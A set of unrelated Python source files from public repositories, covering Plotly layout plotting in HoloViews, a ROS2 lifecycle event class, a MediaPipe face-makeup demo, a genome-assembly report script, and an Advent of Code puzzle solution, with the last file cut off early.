None))\n\n vspacing = param.Number(default=100, bounds=(0, None))\n\n adjoint_spacing = param.Number(default=20, bounds=(0, None))\n\n shared_axes = param.Boolean(default=True, doc=\"\"\"\n Whether axes ranges should be shared across the layout, if\n disabled switches axiswise normalization option on globally.\"\"\")\n\n def __init__(self, layout, **params):\n super().__init__(layout, **params)\n self.layout, self.subplots, self.paths = self._init_layout(layout)\n\n if self.top_level:\n self.traverse(lambda x: attach_streams(self, x.hmap, 2),\n [GenericElementPlot])\n\n def _get_size(self):\n rows, cols = self.layout.shape\n return cols*self.width*0.8, rows*self.height\n\n def _init_layout(self, layout):\n # Situate all the Layouts in the grid and compute the gridspec\n # indices for all the axes required by each LayoutPlot.\n layout_count = 0\n collapsed_layout = layout.clone(shared_data=False, id=layout.id)\n frame_ranges = self.compute_ranges(layout, None, None)\n frame_ranges = dict([(key, self.compute_ranges(layout, key, frame_ranges))\n for key in self.keys])\n layout_items = layout.grid_items()\n layout_dimensions = layout.kdims if isinstance(layout, NdLayout) else None\n layout_subplots, layouts, paths = {}, {}, {}\n for r, c in self.coords:\n # Get view at layout position and wrap in AdjointLayout\n key, view = layout_items.get((c, r) if self.transpose else (r, c), (None, None))\n view = view if isinstance(view, AdjointLayout) else AdjointLayout([view])\n layouts[(r, c)] = view\n paths[r, c] = key\n\n # Compute the layout type from shape\n layout_lens = {1:'Single', 2:'Dual', 3: 'Triple'}\n layout_type = layout_lens.get(len(view), 'Single')\n\n # Get the AdjoinLayout at the specified coordinate\n positions = AdjointLayoutPlot.layout_dict[layout_type]['positions']\n\n # Create temporary subplots to get projections types\n # to create the correct subaxes for all plots in the layout\n layout_key, _ = layout_items.get((r, c), (None, None))\n if isinstance(layout, NdLayout) and layout_key:\n layout_dimensions = dict(zip(layout_dimensions, layout_key))\n\n # Generate the axes and create the subplots with the appropriate\n # axis objects, handling any Empty objects.\n obj = layouts[(r, c)]\n empty = isinstance(obj.main, Empty)\n if empty:\n obj = AdjointLayout([])\n else:\n layout_count += 1\n subplot_data = self._create_subplots(obj, positions,\n layout_dimensions, frame_ranges,\n num=0 if empty else layout_count)\n subplots, adjoint_layout = subplot_data\n\n # Generate the AdjointLayoutsPlot which will coordinate\n # plotting of AdjointLayouts in the larger grid\n plotopts = self.lookup_options(view, 'plot').options\n layout_plot = AdjointLayoutPlot(adjoint_layout, layout_type, subplots, **plotopts)\n layout_subplots[(r, c)] = layout_plot\n if layout_key:\n collapsed_layout[layout_key] = adjoint_layout\n return collapsed_layout, layout_subplots, paths\n\n\n def _create_subplots(self, layout, positions, layout_dimensions, ranges, num=0):\n \"\"\"\n Plot all the views contained in the AdjointLayout Object using axes\n appropriate to the layout configuration. All the axes are\n supplied by LayoutPlot - the purpose of the call is to\n invoke subplots with correct options and styles and hide any\n empty axes as necessary.\n \"\"\"\n subplots = {}\n adjoint_clone = layout.clone(shared_data=False, id=layout.id)\n subplot_opts = dict(adjoined=layout)\n main_plot = None\n for pos in positions:\n # Pos will be one of 'main', 'top' or 'right' or None\n element = layout.get(pos, None)\n if element is None:\n continue\n\n # Options common for any subplot\n vtype = element.type if isinstance(element, HoloMap) else element.__class__\n plot_type = Store.registry[self.renderer.backend].get(vtype, None)\n plotopts = self.lookup_options(element, 'plot').options\n side_opts = {}\n if pos != 'main':\n plot_type = AdjointLayoutPlot.registry.get(vtype, plot_type)\n if pos == 'right':\n side_opts = dict(height=main_plot.height, yaxis='right',\n invert_axes=True, width=120, labelled=['y'],\n xticks=2, show_title=False)\n else:\n side_opts = dict(width=main_plot.width, xaxis='top',\n height=120, labelled=['x'], yticks=2,\n show_title=False)\n\n # Override the plotopts as required\n # Customize plotopts depending on position.\n plotopts = dict(side_opts, **plotopts)\n plotopts.update(subplot_opts)\n\n if plot_type is None:\n self.param.warning(\n \"Plotly plotting class for %s type not found, \"\n \"object will not be rendered.\" % vtype.__name__)\n continue\n num = num if len(self.coords) > 1 else 0\n subplot = plot_type(element, keys=self.keys,\n dimensions=self.dimensions,\n layout_dimensions=layout_dimensions,\n ranges=ranges, subplot=True,\n uniform=self.uniform, layout_num=num,\n **plotopts)\n subplots[pos] = subplot\n if isinstance(plot_type, type) and issubclass(plot_type, GenericCompositePlot):\n adjoint_clone[pos] = subplots[pos].layout\n else:\n adjoint_clone[pos] = subplots[pos].hmap\n if pos == 'main':\n main_plot = subplot\n\n return subplots, adjoint_clone\n\n\n def generate_plot(self, key, ranges=None, is_geo=False):\n ranges = self.compute_ranges(self.layout, self.keys[-1], None)\n plots = [[] for i in range(self.rows)]\n insert_rows = []\n for r, c in self.coords:\n subplot = self.subplots.get((r, c), None)\n if subplot is not None:\n subplots = subplot.generate_plot(key, ranges=ranges, is_geo=is_geo)\n\n # Computes plotting offsets depending on\n # number of adjoined plots\n offset = sum(r >= ir for ir in insert_rows)\n if len(subplots) > 2:\n subplot = figure_grid([[subplots[0], subplots[1]],\n [subplots[2], None]],\n column_spacing=self.adjoint_spacing,\n row_spacing=self.adjoint_spacing)\n elif len(subplots) > 1:\n subplot = figure_grid([subplots],\n column_spacing=self.adjoint_spacing,\n row_spacing=self.adjoint_spacing)\n else:\n subplot = subplots[0]\n\n plots[r + offset] += [subplot]\n\n fig = figure_grid(\n list(reversed(plots)),\n column_spacing=self.hspacing,\n row_spacing=self.vspacing\n )\n\n # Configure axis matching\n if self.shared_axes:\n configure_matching_axes_from_dims(fig)\n\n fig['layout'].update(title=self._format_title(key))\n\n self.drawn = True\n\n self.handles['fig'] = fig\n return self.handles['fig']\n\n\n\nclass AdjointLayoutPlot(PlotlyPlot, GenericAdjointLayoutPlot):\n\n registry = {}\n\n def __init__(self, layout, layout_type, subplots, **params):\n # The AdjointLayout ViewableElement object\n self.layout = layout\n # Type may be set to 'Embedded Dual' by a call it grid_situate\n self.layout_type = layout_type\n self.view_positions = self.layout_dict[self.layout_type]['positions']\n\n # The supplied (axes, view) objects as indexed by position\n super().__init__(subplots=subplots, **params)\n\n def initialize_plot(self, ranges=None, is_geo=False):\n \"\"\"\n Plot all the views contained in the AdjointLayout Object using axes\n appropriate to the layout configuration. All the axes are\n supplied by LayoutPlot - the purpose of the call is to\n invoke subplots with correct options and styles and hide any\n empty axes as necessary.\n \"\"\"\n return self.generate_plot(self.keys[-1], ranges, is_geo=is_geo)\n\n def generate_plot(self, key, ranges=None, is_geo=False):\n adjoined_plots = []\n for pos in ['main', 'right', 'top']:\n # Pos will be one of 'main', 'top' or 'right' or None\n subplot = self.subplots.get(pos, None)\n # If no view object or empty position, disable the axis\n if subplot:\n adjoined_plots.append(\n subplot.generate_plot(key, ranges=ranges, is_geo=is_geo)\n )\n if not adjoined_plots: adjoined_plots = [None]\n return adjoined_plots\n\n\n\nclass GridPlot(PlotlyPlot, GenericCompositePlot):\n \"\"\"\n Plot a group of elements in a grid layout based on a GridSpace element\n object.\n \"\"\"\n\n hspacing = param.Number(default=15, bounds=(0, None))\n\n vspacing = param.Number(default=15, bounds=(0, None))\n\n shared_axes = param.Boolean(default=True, doc=\"\"\"\n Whether axes ranges should be shared across the layout, if\n disabled switches axiswise normalization option on globally.\"\"\")\n\n def __init__(self, layout, ranges=None, layout_num=1, **params):\n if not isinstance(layout, GridSpace):\n raise Exception(\"GridPlot only accepts GridSpace.\")\n super().__init__(layout=layout, layout_num=layout_num,\n ranges=ranges, **params)\n self.cols, self.rows = layout.shape\n self.subplots, self.layout = self._create_subplots(layout, ranges)\n\n if self.top_level:\n self.traverse(lambda x: attach_streams(self, x.hmap, 2),\n [GenericElementPlot])\n\n\n def _create_subplots(self, layout, ranges):\n subplots = {}\n frame_ranges = self.compute_ranges(layout, None, ranges)\n frame_ranges = dict([(key, self.compute_ranges(layout, key, frame_ranges))\n for key in self.keys])\n collapsed_layout = layout.clone(shared_data=False, id=layout.id)\n for coord in layout.keys(full_grid=True):\n if not isinstance(coord, tuple): coord = (coord,)\n view = layout.data.get(coord, None)\n # Create subplot\n if view is not None:\n vtype = view.type if isinstance(view, HoloMap) else view.__class__\n opts = self.lookup_options(view, 'plot').options\n else:\n vtype = None\n\n # Create axes\n kwargs = {}\n if isinstance(layout, GridMatrix):\n if view.traverse(lambda x: x, [Histogram]):\n kwargs['shared_axes'] = False\n\n # Create subplot\n plotting_class = Store.registry[self.renderer.backend].get(vtype, None)\n if plotting_class is None:\n if view is not None:\n self.param.warning(\n \"Plotly plotting class for %s type not found, \"\n \"object will not be rendered.\" % vtype.__name__)\n else:\n subplot = plotting_class(view, dimensions=self.dimensions,\n show_title=False, subplot=True,\n ranges=frame_ranges, uniform=self.uniform,\n keys=self.keys, **dict(opts, **kwargs))\n collapsed_layout[coord] = (subplot.layout\n if isinstance(subplot, GenericCompositePlot)\n else subplot.hmap)\n subplots[coord] = subplot\n return subplots, collapsed_layout\n\n\n def generate_plot(self, key, ranges=None, is_geo=False):\n ranges = self.compute_ranges(self.layout, self.keys[-1], None)\n plots = [[] for r in range(self.cols)]\n for i, coord in enumerate(self.layout.keys(full_grid=True)):\n r = i % self.cols\n subplot = self.subplots.get(wrap_tuple(coord), None)\n if subplot is not None:\n plot = subplot.initialize_plot(ranges=ranges, is_geo=is_geo)\n plots[r].append(plot)\n else:\n plots[r].append(None)\n\n # Compute final width/height\n w, h = self._get_size(subplot.width, subplot.height)\n\n fig = figure_grid(plots,\n column_spacing=self.hspacing,\n row_spacing=self.vspacing,\n share_xaxis=True,\n share_yaxis=True,\n width=w,\n height=h\n )\n\n fig['layout'].update(title=self._format_title(key))\n\n self.drawn = True\n\n self.handles['fig'] = fig\n return self.handles['fig']\n\n\n def _get_size(self, width, height):\n max_dim = max(self.layout.shape)\n # Reduce plot size as GridSpace gets larger\n shape_factor = 1. / max_dim\n # Expand small grids to a sensible viewing size\n expand_factor = 1 + (max_dim - 1) * 0.1\n scale_factor = expand_factor * shape_factor\n cols, rows = self.layout.shape\n return (scale_factor * cols * width,\n scale_factor * rows * height)\n","repo_name":"holoviz/holoviews","sub_path":"holoviews/plotting/plotly/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":15750,"program_lang":"python","lang":"en","doc_type":"code","stars":2514,"dataset":"github-code","pt":"20"} +{"seq_id":"29117052748","text":"from typing import Text\n\nfrom launch.event import Event\n\nimport lifecycle_msgs.msg\n\nif False:\n # imports here would cause loops, but are only used as forward-references for type-checking\n from ...actions import LifecycleNode # noqa: F401\n\n\nclass StateTransition(Event):\n \"\"\"Event emitted when a lifecycle node makes a state transition.\"\"\"\n\n name = 'launch_ros.events.lifecycle.StateTransition'\n\n def __init__(\n self,\n *,\n action: 'LifecycleNode',\n msg: lifecycle_msgs.msg.TransitionEvent\n ) -> None:\n \"\"\"\n Create a StateTransition event.\n\n :param: action the instance of class::`LifecycleNode` that generated this event\n :param: msg the instance of the ROS message TransitionEvent that generated this event\n \"\"\"\n super().__init__()\n self.__action = action\n self.__msg = msg\n self.__timestamp = msg.timestamp\n self.__transition = msg.transition.label\n self.__start_state = msg.start_state.label\n self.__goal_state = msg.goal_state.label\n\n @property\n def action(self) -> 'LifecycleNode':\n \"\"\"Getter for action.\"\"\"\n return self.__action\n\n @property\n def msg(self) -> lifecycle_msgs.msg.TransitionEvent:\n \"\"\"Getter for msg.\"\"\"\n return self.__msg\n\n @property\n def timestamp(self) -> int:\n \"\"\"Getter for timestamp.\"\"\"\n return self.__timestamp\n\n @property\n def transition(self) -> Text:\n \"\"\"Getter for transition.\"\"\"\n return self.__transition\n\n @property\n def start_state(self) -> Text:\n \"\"\"Getter for start_state.\"\"\"\n return self.__start_state\n\n @property\n def goal_state(self) -> Text:\n \"\"\"Getter for goal_state.\"\"\"\n return self.__goal_state\n","repo_name":"ros2/launch_ros","sub_path":"launch_ros/launch_ros/events/lifecycle/state_transition.py","file_name":"state_transition.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"20"} +{"seq_id":"636158485","text":"import numpy as np\nimport cv2\nimport queue\nimport threading\n\nimport mediapipe as mp\nfrom mediapipe.tasks import python\nfrom mediapipe.tasks.python import vision\n\nfrom utils import draw_landmarks_on_image, apply_makeup\n\nMODEL_PATH = \"model/face_landmarker.task\"\n\nBaseOptions = mp.tasks.BaseOptions\nFaceLandmarker = vision.FaceLandmarker\nFaceLandmarkerOptions = vision.FaceLandmarkerOptions\nFaceLandmarkerResult = vision.FaceLandmarkerResult\nVisionRunningMode = vision.RunningMode\n\ndef main():\n\n \n def pass_result(result: FaceLandmarkerResult, output_image: mp.Image, timestamp_ms: int):\n if result:\n queue.put(result)\n\n options = FaceLandmarkerOptions(\n base_options = BaseOptions(model_asset_path = MODEL_PATH),\n running_mode = VisionRunningMode.LIVE_STREAM,\n result_callback = pass_result\n )\n\n\n with FaceLandmarker.create_from_options(options) as landmarker:\n\n stream = cv2.VideoCapture(0)\n i = 0\n while True:\n ret, frame = stream.read()\n if ret:\n frame_timestamp = stream.get(cv2.CAP_PROP_POS_MSEC)\n\n rgb_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n\n mp_image = mp.Image(\n image_format = mp.ImageFormat.SRGB,\n data = rgb_frame\n )\n i += 1\n landmarker.detect_async(mp_image, i)#int(frame_timestamp))\n\n face_landmarks_result = queue.get()\n\n #print(face_landmarks_result)\n #annotated_image = draw_landmarks_on_image(mp_image.numpy_view(),face_landmarks_result)\n annotated_image = apply_makeup(mp_image.numpy_view(),face_landmarks_result)\n cv2.imshow('video', cv2.cvtColor(annotated_image, cv2.COLOR_RGB2BGR))\n \n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n \n stream.release()\n cv2.destroyAllWindows()\n\n\n\n\nif __name__ == '__main__':\n queue = queue.Queue() \n\n # Create a thread for running the FaceLandmarker\n face_landmarker_thread = threading.Thread(target=main)\n\n face_landmarker_thread.start()\n ","repo_name":"DavidJimenez10/RT-Makeup-Mediapipe","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"32447318502","text":"import sys\nimport argparse\nimport os\nimport re\nimport subprocess\nimport shutil\n\n#https://py-gfm.readthedocs.io/en/latest/\nimport markdown\nfrom mdx_gfm import GithubFlavoredMarkdownExtension\n\n#multiprocessing stuff\nfrom functools import partial\nfrom multiprocessing import cpu_count\nfrom multiprocessing import Pool\nfrom multiprocessing.dummy import Pool as ThreadPool\n\nclass FullPaths(argparse.Action):\n \"\"\"Expand user- and relative-paths\"\"\"\n def __call__(self, parser, namespace, values, option_string=None):\n setattr(namespace, self.dest,\n os.path.abspath(os.path.expanduser(values)))\n\ndef parse_arguments():\n parser=argparse.ArgumentParser(description=__doc__)\n parser.add_argument(\"-c\", \"--censor\",\n type=str,\n nargs='+',\n help=\"\"\"list of strings to censor for sending docs to\n non-collaborators\"\"\")\n parser.add_argument(\"-q\", \"--quiet\",\n action='store_true')\n\n options = parser.parse_args()\n return options\n\nclass merRunAnalyzer:\n def __init__(self, directory, censor, quiet=False):\n \"\"\"In a future edit, change this method to auto-detect whether the\n run is diploid mode 1, 2, or 3\n \"\"\"\n self.home = os.path.abspath(directory.strip())\n self.homeBasename = os.path.basename(directory.strip())\n self.parent = os.path.dirname(self.home.strip())\n\n #setup the bit to cleanly censor the files\n self.home.strip().rsplit(\"/\")\n censor = [x for x in self.parent.strip().rsplit(\"/\") if x]\n self.censor = {strip: \"\" for strip in censor}\n self.rep = dict((re.escape(k), v) for k, v in self.censor.items())\n self.pattern = re.compile(\"|\".join(self.rep.keys()))\n\n #filename prefix, sanitized with censor method\n self.outname=self.str_ripper(os.path.basename(self.home))\n self.merReportsDir = os.path.join(self.parent, \"meraculous_reports\")\n self.reportDir = os.path.join(self.merReportsDir, self.outname)\n\n self.isMer = self.is_meraculous()\n self.quiet = quiet\n\n self.mer_size = None\n self.diploid_mode = None\n self.genome_size = None\n self.min_depth_cutoff = None\n if self.isMer:\n self.get_Params()\n\n def is_meraculous(self):\n os.chdir(self.home)\n subdirs = [dirs.strip() for dirs in os.listdir(self.home) if os.path.isdir(dirs.strip())]\n print(subdirs)\n os.chdir(self.parent)\n return (\"log\" in subdirs) and (\"meraculous_import\" in subdirs)\n\n def call_sys(self, callString, logfile):\n print(\"\\ncalling command:\", file=logfile)\n print(self.str_ripper(callString), file=logfile)\n p = subprocess.run(callString, shell=True, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n universal_newlines=True)\n output = self.str_ripper(str(p.stdout))\n err = self.str_ripper(str(p.stderr))\n print(output, file=logfile)\n print(err, file=logfile)\n if not self.quiet:\n print(output)\n print(err)\n return (output, err)\n\n def make_HTML(self, logfile):\n html_filepath = os.path.join(\n self.merReportsDir,\n \"{0}_report.html\".format(self.outname))\n print(\"making html at {}\".format(html_filepath))\n callString = \"python -m markdown -x markdown.extensions.fenced_code -x pymdownx.b64 {0} > {1}\".format(\n logfile,\n html_filepath)\n p = subprocess.run(callString, shell=True)\n\n def get_Params(self):\n logFile = os.path.join(self.home, \"log/meraculous.log\")\n grep_list=[\"mer_size\", \"diploid_mode\",\n \"genome_size\", \"min_depth_cutoff\"]\n done = {x:False for x in grep_list}\n\n with open(logFile, \"r\") as f:\n for line in f:\n for query in grep_list:\n if re.search(query, line):\n value=line.strip().split()[1]\n print(\"query: {}, value: {}\".format(query, value))\n setattr(self, query, value)\n done[query] = True\n if False not in done.values():\n break\n\n def str_ripper(self, text):\n \"\"\"Got this code from here:\n http://stackoverflow.com/questions/6116978/python-replace-multiple-strings\n\n This method takes a set of strings, A, and removes all whole\n elements of set A from string B.\n\n Input: text string to strip based on instance attribute self.censor\n Output: a stripped (censored) text string\n \"\"\"\n return self.pattern.sub(lambda m: self.rep[re.escape(m.group(0))], text)\n\n def generate_report(self):\n \"\"\"This method does most of the work for this class. It generates an\n individual report for the instance.\n \"\"\"\n\n print(\"making plot for {}\".format(self.outname))\n # make the markdown file to log to while doing analyses\n logfile_filepath = os.path.join(\n self.reportDir,\n \"{0}_report.md\".format(self.outname))\n\n #check if seld.reportDir exists\n # if not, make it\n if not os.path.exists(self.reportDir):\n print(\"making the directory: {}\".format(self.reportDir))\n os.makedirs(self.reportDir)\n\n logfile = open(logfile_filepath, 'w')\n\n # make a title in the markdown file\n print(\"# {0}\".format(self.outname), file=logfile)\n print(\"## Meraculous assembly QC analysis\", file=logfile)\n\n # 0. Run params\n print(\"### 0. Run params\", file=logfile)\n print(\"\", file=logfile)\n print(\"- mer_size: `{}`\".format(self.mer_size), file=logfile)\n print(\"- diploid_mode: `{}`\".format(self.diploid_mode), file=logfile)\n print(\"- genome_size: `{}`\".format(self.genome_size), file=logfile)\n print(\"- min_depth_cutoff: `{}`\".format(self.min_depth_cutoff), file=logfile)\n print(\"\", file=logfile)\n\n # 1. get the mercount and kha plot\n print(\"### 1. `meraculous_mercount` output\", file = logfile)\n print(\"\", file=logfile)\n print(\"#### `mercount.png`\", file = logfile)\n print(\"\", file=logfile)\n mercountFromPath = os.path.join(self.homeBasename, \"meraculous_mercount/mercount.png\")\n mercountToPath = os.path.join(self.reportDir, \"mercount.png\")\n mercountHTML = os.path.join(\n os.path.basename(os.path.split(mercountToPath)[0]),\n os.path.basename(mercountToPath))\n shutil.copyfile(mercountFromPath, mercountToPath)\n print(\"![mercount]({0})\".format(mercountHTML),\n file=logfile)\n print(\"\", file=logfile)\n print(\"#### `kha.png`\", file = logfile)\n print(\"\", file=logfile)\n khaFromPath = os.path.join(self.homeBasename, \"meraculous_mercount/kha.png\")\n khaToPath = os.path.join(self.reportDir, \"kha.png\")\n khaHTML = os.path.join(\n os.path.basename(os.path.split(khaToPath)[0]),\n os.path.basename(khaToPath))\n shutil.copyfile(khaFromPath, khaToPath)\n print(\"![kha]({0})\".format(khaHTML),\n file=logfile)\n print(\"\", file=logfile)\n\n # 2. run fasta_stats on UUtig.fa\n # this is the result of the first contigs produced by meraculous_contigs\n print(\"### 2. `fasta_stats UUtigs.fa`\", file=logfile)\n print(\"\", file=logfile)\n print(\"\"\"This is the output of `meraculous_contigs`. In a diploid genome,\n the total length of all contigs at this stage should be\n larger than the expected genome size because of the\n presence of haplotype variant UUtigs. (Meraculous\n manual)\"\"\", file=logfile)\n print(\"\",file=logfile)\n print(\"```\", file=logfile)\n callString=\"fasta_stats {0}\".format(\n \"{}/meraculous_contigs/UUtigs.fa\".format(self.home))\n self.call_sys(callString, logfile)\n print(\"```\", file=logfile)\n print(\"\",file=logfile)\n\n if int(self.diploid_mode) == 1:\n #2.5. Check out the output of meraculous_bubble\n print(\"### 2.5. Diploid mode plot\", file=logfile)\n print(\"\", file=logfile)\n print(\"\"\"- If there are two peaks, and the \"half-depth\" peak is much larger\n than the one at full depth, that's a scenario that's\n best handled by diploid_mode 2. If it's the\n opposite, make sure the parameter\n 'bubble_depth_threshold' is being set correctly (if\n auto-detected, the result is written into\n `meraculous_bubble/haplotigs.dmin.err`) - E. Goltsman.\"\"\",\n file=logfile)\n print(\"\"\"- For diploid assemblies, you should examine the file\n haplotigs.depth.hist.png and verify that there are\n two distinct peaks, one at roughly half depth of the\n other. At this point you may want to check your\n bubble_depth_threshold parameter and adjust it to a\n value corresponding to the local minimum between the\n two peaks (_ if you had originally set it to 0\n Meraculous auto-detects this threshold_). - Meraculous Manual\"\"\",\n file=logfile)\n print(\"\", file=logfile)\n bblFromPath = os.path.join(self.homeBasename,\n \"meraculous_bubble/haplotigs.depth.hist.png\")\n bblToPath = os.path.join(self.reportDir, \"haplotigs.depth.hist.png\")\n bblHTML = os.path.join(\n os.path.basename(os.path.split(bblToPath)[0]),\n os.path.basename(bblToPath))\n shutil.copyfile(bblFromPath, bblToPath)\n print(\"![bbl]({0})\".format(bblHTML),\n file=logfile)\n print(\"\", file=logfile)\n bbl_detect=os.path.join(self.home, \"meraculous_bubble/haplotigs.dmin.err\")\n if os.path.exists(bbl_detect):\n #in a later version, just look at the meraculous log file\n print(\"\", file=logfile)\n print(\"#### `bubble_depth_threshold` auto-detected\", file=logfile)\n print(\"\", file=logfile)\n print(\"```\", file=logfile)\n callString=\"cat {0}\".format(bbl_detect)\n self.call_sys(callString, logfile)\n print(\"```\", file=logfile)\n print(\"\", file=logfile)\n else:\n print(\"\", file=logfile)\n print(\"#### `bubble_depth_threshold` was user-input\", file=logfile)\n print(\"\", file=logfile)\n print(\"#### `fasta_stats meraculous_bubble/haplotigs.fa\", file=logfile)\n print(\"\", file=logfile)\n print(\"\"\"- These are the assembly stats after running\n `meraculous_bubble`.\"\"\", file=logfile)\n print(\"\", file=logfile)\n print(\"```\", file=logfile)\n callString=\"fasta_stats {0}\".format(\n os.path.join(self.home, \"meraculous_bubble/haplotigs.fa\"))\n self.call_sys(callString, logfile)\n print(\"```\", file=logfile)\n print(\"\", file=logfile)\n\n if int(self.diploid_mode) == 1:\n print(\"### 2.6. Note on `meraculous_ono` with `diploid_mode=1`\", file=logfile)\n print(\"\", file=logfile)\n print(\"\"\"- [ Note: If running in diploid_mode 1, the scaffolding is initially\n performed using combined linkage info from alternative\n variant diplotigs, i.e., both variants contribute read\n pairs to the same link as if they were one and the\n same contig. Then, using haplotype-specific read\n mapping info, phased variant paths are determined and\n the scaffold content is corrected in a haplotype\n consistent manner. As a result, one variant path\n (typically one with the higher overall depth) will be\n preserved in a multi-contig scaffold while the\n individual alternative variants are represented as\n unlinked, singleton scaffolds. A list of these\n singleton alternative variant scaffolds is also\n saved. For more on diploid-aware assembly, see section\n ‘Diploid assembly’. ] - _Meraculous manual_\"\"\", file=logfile)\n\n print(\"### 3. `meraculous_gap_closure`\", file=logfile)\n print(\"\", file=logfile)\n print(\"#### 3.1 `final.scaffolds.fa`\", file=logfile)\n print(\"\", file=logfile)\n print(\"```\", file=logfile)\n callString=\"fasta_stats {0}\".format(\n os.path.join(self.home, \"meraculous_gap_closure/final.scaffolds.fa\"))\n self.call_sys(callString, logfile)\n print(\"```\", file=logfile)\n print(\"\", file=logfile)\n\n if int(self.diploid_mode) == 1:\n print(\"#### 3.1. Note on haplotype final scaffolds\", file=logfile)\n print(\"\", file=logfile)\n print(\"\"\"- [Note: when running in diploid_mode 1, if a gap\n represents a polymorphic region that had been actively\n removed earlier (i.e., a half-depth isotig), Meraculous\n will attempt to walk across it using reads from the more\n abundant allele]. - _Meraculous manual_\"\"\", file=logfile)\n print(\"\"\"- When running in diploid_mode 1, a “single-haplotype” sequence\n file (final.scaffolds.single-haplotype.fa) where the\n alternative variant scaffolds have been removed is also\n created. - _Meraculous manual_\"\"\", file=logfile)\n print(\"\", file=logfile)\n print(\"```\", file=logfile)\n callString=\"fasta_stats {0}\".format(\n os.path.join(self.home, \"meraculous_gap_closure/final.scaffolds.single-haplotype.fa\"))\n self.call_sys(callString, logfile)\n print(\"```\", file=logfile)\n print(\"\", file=logfile)\n\n print(\"### 4. `meraculous_final_results`\", file=logfile)\n print(\"\"\"- The final output of meraculous\"\"\", file=logfile)\n print(\"\", file=logfile)\n print(\"```\", file=logfile)\n callString=\"fasta_stats {0}\".format(\n os.path.join(self.home, \"meraculous_final_results/final.scaffolds.fa\"))\n self.call_sys(callString, logfile)\n print(\"```\", file=logfile)\n print(\"\", file=logfile)\n\n # this block handles the printing the meraculous log to the new output\n # directory\n print(\"### 5. `meraculous_log`\", file=logfile)\n print(\"\"\"- The final output of meraculous\"\"\", file=logfile)\n print(\"\", file=logfile)\n print(\"```\", file=logfile)\n callString=\"cat {0}\".format(\n os.path.join(self.home, \"log/meraculous.log\"))\n output, err = self.call_sys(callString, logfile)\n print(\"```\", file=logfile)\n print(\"\", file=logfile)\n new_mer_log_path = os.path.join(self.reportDir, \"meraculous.log\")\n with open (new_mer_log_path, \"w\") as f:\n print(output, file=f)\n\n logfile.close()\n self.make_HTML(logfile_filepath)\n\ndef run_merReport_dummy(instance):\n \"\"\"This function is a helper method for merReport.generate_report().\n Specifically, it just calls the generate_report()\n function for each instance of class PreqcAnalysis to get around the\n limitations of the multiprocessing module.\"\"\"\n instance.generate_report()\n\n\ndef determine_pool_size(job_vector):\n \"\"\"This function determines how large of a pool to make based on the\n system resources currently available and how many jobs there are\n to complete.\n \"\"\"\n\n available_threads = cpu_count()\n total_jobs = len(job_vector)\n threads_to_pass = total_jobs\n if total_jobs >= available_threads:\n threads_to_pass = available_threads\n if threads_to_pass > 90:\n threads_to_pass = 90\n print(\"There are {} threads available.\\nThere are {} jobs:\\nMaking a pool with {} threads\".format(\n available_threads, total_jobs, threads_to_pass), file = sys.stderr)\n return threads_to_pass\n\ndef available_threads():\n \"\"\"This is customized to always leave 6 threads on a server that has 96\n total threads, but this process takes such little time that it doesn't\n really matter.\n \"\"\"\n threads = cpu_count()\n if threads >= 90:\n return 90\n else:\n return threads\n\ndef main():\n \"\"\"1. Parse args\n 2. Figure out which directories are actually meraculous run directories\n 3. Make an instance for each directory and generate a report\n \"\"\"\n home = os.getcwd()\n options = parse_arguments()\n print(options)\n print()\n\n #get a list of all directories in the cwd\n dirs = [direc for direc in os.listdir(home) if os.path.isdir(direc)]\n #instantiate all of the classes that we will be using in parallel processing\n instances = []\n for each in dirs:\n thisInstance = meraculousRunAnalyzer(each, options.censor, options.quiet)\n #only process the instances that are meraculous directories\n if thisInstance.isMer:\n instances.append(thisInstance)\n\n if len(instances) == 0:\n print(\"There are no meraculous folders in this directory. Exiting\")\n elif len(instances) > 0:\n # run the program for each instance\n #process each file sequentially using max number of threads\n #determine the pool size to work with the unique sample names\n pool_size = determine_pool_size(instances)\n pool = ThreadPool(pool_size)\n results = pool.map(run_merReport_dummy, instances)\n pool.close()\n pool.join()\n\nif __name__ == \"__main__\":\n sys.exit(main())\n\n","repo_name":"conchoecia/gloTK","sub_path":"scripts/glotk-mer-reporter.py","file_name":"glotk-mer-reporter.py","file_ext":"py","file_size_in_byte":17907,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"23"} +{"seq_id":"38377829608","text":"import sys\n\nimport numpy as np\n\ndef input():\n with open(sys.argv[1]) as f:\n for line in f:\n yield line\n\nclass TreeField:\n def __init__(self, array):\n self.tree_field = np.array(array)\n\n def has_tree(self, x, y):\n return self.tree_field[y, x]\n\n def height(self):\n return self.tree_field.shape[0]\n\n def width(self):\n return self.tree_field.shape[1]\n\n def traverse(self, x_stride, y_stride):\n x_pos, y_pos = 0, 0\n trees_encountered = 0\n while y_pos < self.height():\n if self.has_tree(x_pos,y_pos):\n trees_encountered += 1\n y_pos += y_stride\n x_pos = (x_pos + x_stride) % self.width()\n return trees_encountered\n\n\n def __repr__(self):\n return '\\n'.join([''.join(['#' if self.has_tree(x,y) else '.' for x in range(self.width())]) for y in range(self.height())])\n\ndef main():\n tree_field = []\n for line in input():\n row = []\n for c in line.strip():\n row.append(c == '#')\n tree_field.append(row)\n\n tree_field = TreeField(tree_field)\n\n slopes_to_test = [(1,1), (3,1), (5,1), (7,1), (1,2)]\n\n product = 1\n for x_stride, y_stride in slopes_to_test:\n product *= tree_field.traverse(x_stride, y_stride)\n\n print(product)\n\nif __name__ == '__main__':\n main()\n","repo_name":"robbystk/advent-of-code-2020","sub_path":"03-toboggan-trajectory/trees.py","file_name":"trees.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"17206208815","text":"import numpy as np\nimport pred_util as pu\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nRARENESS = 1000\nTR = 0.7\nC = 1e5\nALPHA = 0.1\n\ndata = pu.cleaned_data('data_sample.csv')\n\n# we shall now identify a relatively rare feature - which occurs around 1,000 times (1,\n# 000 patients had taken it), and then construct a feature vector for every patient that has done\n# it, considering the rare test 